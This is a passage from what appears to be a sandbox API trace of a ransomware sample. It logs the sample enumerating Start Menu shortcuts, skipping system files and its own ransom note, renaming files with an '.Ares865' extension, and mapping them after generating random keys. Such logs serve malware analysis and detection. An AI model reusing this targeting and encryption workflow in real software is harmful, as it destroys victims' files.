menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk.ares865"), dwFlags=0x1) returned 1 [0067.027] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 language preferences.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.027] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2751) returned 1 [0067.027] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0067.027] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.027] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.027] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.028] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.028] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.028] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xdc0, lpName=0x0) returned 0x120 [0067.030] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xdc0) returned 0x190000 [0067.031] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.031] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.031] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.031] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.031] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.032] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.032] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.032] CloseHandle (hObject=0x120) returned 1 [0067.032] CloseHandle (hObject=0x12c) returned 1 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0067.032] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77fec150, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc119ff40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc119ff40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xb15, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office 2010 Upload Center.lnk", cAlternateFileName="MICROS~3.LNK")) returned 1 [0067.032] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="aoldtz.exe") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2=".") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="..") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="windows") returned -1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="bootmgr") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="temp") returned -1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="pagefile.sys") returned -1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="boot") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="ids.txt") returned 1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="ntuser.dat") returned -1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="perflogs") returned -1 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2="MSBuild") returned -1 [0067.033] lstrlenW (lpString="Microsoft Office 2010 Upload Center.lnk") returned 39 [0067.033] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk") returned 130 [0067.033] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft Office 2010 Upload Center.lnk" | out: lpString1="Microsoft Office 2010 Upload Center.lnk") returned="Microsoft Office 2010 Upload Center.lnk" [0067.033] lstrlenW (lpString="Microsoft Office 2010 Upload Center.lnk") returned 39 [0067.033] lstrlenW (lpString="Ares865") returned 7 [0067.033] lstrcmpiW (lpString1="ter.lnk", lpString2="Ares865") returned 1 [0067.033] lstrlenW (lpString=".dll") returned 4 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2=".dll") returned 1 [0067.033] lstrlenW (lpString=".lnk") returned 4 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2=".lnk") returned 1 [0067.033] lstrlenW (lpString=".ini") returned 4 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2=".ini") returned 1 [0067.033] lstrlenW (lpString=".sys") returned 4 [0067.033] lstrcmpiW (lpString1="Microsoft Office 2010 Upload Center.lnk", lpString2=".sys") returned 1 [0067.033] lstrlenW (lpString="Microsoft Office 2010 Upload Center.lnk") returned 39 [0067.033] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.Ares865") returned 131 [0067.033] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk.ares865"), dwFlags=0x1) returned 1 [0067.035] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office 2010 upload center.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.035] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2837) returned 1 [0067.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.035] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.035] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.036] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.036] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.036] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe20, lpName=0x0) returned 0x120 [0067.038] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe20) returned 0x190000 [0067.039] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.039] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.040] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.040] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.040] CloseHandle (hObject=0x120) returned 1 [0067.040] CloseHandle (hObject=0x12c) returned 1 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.040] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.040] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77fec150, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc1179de0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc1179de0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xb3b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office Picture Manager.lnk", cAlternateFileName="MICROS~2.LNK")) returned 1 [0067.040] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.040] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="aoldtz.exe") returned 1 [0067.040] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2=".") returned 1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="..") returned 1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="windows") returned -1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="bootmgr") returned 1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="temp") returned -1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="pagefile.sys") returned -1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="boot") returned 1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="ids.txt") returned 1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="ntuser.dat") returned -1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="perflogs") returned -1 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2="MSBuild") returned -1 [0067.041] lstrlenW (lpString="Microsoft Office Picture Manager.lnk") returned 36 [0067.041] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk") returned 123 [0067.041] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft Office Picture Manager.lnk" | out: lpString1="Microsoft Office Picture Manager.lnk") returned="Microsoft Office Picture Manager.lnk" [0067.041] lstrlenW (lpString="Microsoft Office Picture Manager.lnk") returned 36 [0067.041] lstrlenW (lpString="Ares865") returned 7 [0067.041] lstrcmpiW (lpString1="ger.lnk", lpString2="Ares865") returned 1 [0067.041] lstrlenW (lpString=".dll") returned 4 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2=".dll") returned 1 [0067.041] lstrlenW (lpString=".lnk") returned 4 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2=".lnk") returned 1 [0067.041] lstrlenW (lpString=".ini") returned 4 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2=".ini") returned 1 [0067.041] lstrlenW (lpString=".sys") returned 4 [0067.041] lstrcmpiW (lpString1="Microsoft Office Picture Manager.lnk", lpString2=".sys") returned 1 [0067.041] lstrlenW (lpString="Microsoft Office Picture Manager.lnk") returned 36 [0067.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.Ares865") returned 128 [0067.041] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk.ares865"), dwFlags=0x1) returned 1 [0067.043] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft office picture manager.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.043] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2875) returned 1 [0067.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.043] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.044] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xe40, lpName=0x0) returned 0x120 [0067.045] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe40) returned 0x190000 [0067.046] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.047] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.047] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.047] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.047] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.047] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.048] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.048] CloseHandle (hObject=0x120) returned 1 [0067.048] CloseHandle (hObject=0x12c) returned 1 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0067.048] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.048] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc11c60a0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xc11c60a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc11c60a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xbb7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Project Server 2010 Accounts.lnk", cAlternateFileName="MIBC23~1.LNK")) returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="aoldtz.exe") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2=".") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="..") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="windows") returned -1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="bootmgr") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="temp") returned -1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="pagefile.sys") returned -1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="boot") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="ids.txt") returned 1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="ntuser.dat") returned -1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="perflogs") returned -1 [0067.048] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2="MSBuild") returned -1 [0067.048] lstrlenW (lpString="Microsoft Project Server 2010 Accounts.lnk") returned 42 [0067.048] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk") returned 120 [0067.048] lstrcpyW (in: lpString1=0x2cce4a8, lpString2="Microsoft Project Server 2010 Accounts.lnk" | out: lpString1="Microsoft Project Server 2010 Accounts.lnk") returned="Microsoft Project Server 2010 Accounts.lnk" [0067.049] lstrlenW (lpString="Microsoft Project Server 2010 Accounts.lnk") returned 42 [0067.049] lstrlenW (lpString="Ares865") returned 7 [0067.049] lstrcmpiW (lpString1="nts.lnk", lpString2="Ares865") returned 1 [0067.049] lstrlenW (lpString=".dll") returned 4 [0067.049] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2=".dll") returned 1 [0067.049] lstrlenW (lpString=".lnk") returned 4 [0067.049] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2=".lnk") returned 1 [0067.049] lstrlenW (lpString=".ini") returned 4 [0067.049] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2=".ini") returned 1 [0067.049] lstrlenW (lpString=".sys") returned 4 [0067.049] lstrcmpiW (lpString1="Microsoft Project Server 2010 Accounts.lnk", lpString2=".sys") returned 1 [0067.049] lstrlenW (lpString="Microsoft Project Server 2010 Accounts.lnk") returned 42 [0067.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.Ares865") returned 134 [0067.049] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk.ares865"), dwFlags=0x1) returned 1 [0067.053] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\microsoft office\\microsoft office 2010 tools\\microsoft project server 2010 accounts.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.053] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2999) returned 1 [0067.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.053] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0067.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0067.054] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.054] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xec0, lpName=0x0) returned 0x120 [0067.056] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xec0) returned 0x190000 [0067.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0067.058] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.058] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0067.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0067.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0067.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.058] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.058] CloseHandle (hObject=0x120) returned 1 [0067.059] CloseHandle (hObject=0x12c) returned 1 [0067.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 